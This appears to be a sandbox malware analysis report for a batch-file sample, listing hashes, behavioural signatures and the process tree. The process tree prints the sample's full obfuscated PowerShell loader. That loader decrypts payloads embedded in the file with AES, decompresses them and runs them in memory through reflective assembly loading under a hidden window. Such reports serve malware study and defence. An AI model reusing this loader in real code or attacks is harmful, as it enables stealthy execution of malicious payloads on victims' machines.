Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
19/04/2023, 16:07
Static task
static1
Behavioral task
behavioral1
Sample
10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource
win10v2004-20230220-en
General
-
Target
10FpDvByrqvHWUgFegBMjMmEkh.bat
-
Size
189KB
-
MD5
98b57df374d3888660dca7b8707aa9e5
-
SHA1
4afb4626817228104bd752ba38650cef356e9afc
-
SHA256
23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1
-
SHA512
a21e4b1af9ddc7731356109bc1f2f75615db963e34666216c46e7b14bf28ac7f7c8432c060a2b67335111cf434cefa90de0e79e9b7c54a996c38d1fc79f26931
-
SSDEEP
3072:jJ6sy+qsWPFiC5x1ElXP6RxLVYJdq7GOngOIxKtQPula2Mjr/L7pcTDlXMW5aOcT:hYs21xCIjLquDlIx91n/LCTDlXXHW
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 972 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 972 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 904 powershell.exe 972 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 972 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1420 wrote to memory of 904 1420 cmd.exe 29 PID 1420 wrote to memory of 904 1420 cmd.exe 29 PID 1420 wrote to memory of 904 1420 cmd.exe 29 PID 1420 wrote to memory of 972 1420 cmd.exe 30 PID 1420 wrote to memory of 972 1420 cmd.exe 30 PID 1420 wrote to memory of 972 1420 cmd.exe 30 PID 1420 wrote to memory of 972 1420 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe"C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f